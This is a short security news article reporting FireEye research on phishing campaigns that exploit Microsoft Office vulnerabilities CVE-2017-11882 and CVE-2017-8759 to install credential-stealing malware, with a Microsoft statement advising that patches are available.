It seems that Microsoft Office software has vulnerabilities that are being exploited by hackers to spread complex malware that’s capable of stealing credentials, dropping additional malware, cryptocurrency mining, and conducting distributed denial-of-service (DDoS) attacks.
The malware is not new as it has been active since 2016 but it appears that it can be purchased on underground forums for as little as $75 (THB2,400).
It was researchers at FireEye that have highlighted the problem and said that hackers are attempting to exploit vulnerabilities in Microsoft Office.
Hackers are sending phishing emails contain malicious documents which the readers are naturally encouraged to open. If the documents are opened however, the victim becomes infected with the malware.
The main vulnerability exploited by the attackers is CVE-2017-11882 which is a security vulnerability in Microsoft Office which enables arbitrary code to run when a maliciously-modified file is opened. When exploited in this case, additional downloads are triggered. The new download contains PowerShell script which then drops the malware onto the victim’s device.
If the PowerShell script is successfully run, it injects code which downloads the final payload from the malicious command and control server, which unpacks the malware onto the target computer, alongside functions which allow the attacker to use Tor to hide their tracks.
The malware allows hackers to steal passwords from a range of sources leaving the victim wide open to both identity and financial theft.
“Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated,” said FireEye researchers Swapnil Patil and Yogesh Londhe said in a blog post about the issue.
Users should ensure they’ve downloaded all the patches published to protect against CVE-2017-11882 and CVE-2017-8759.
“Security updates were released last year and customers that have applied them, or have automatic updates enabled are protected,” a Microsoft spokesperson told ZDNet.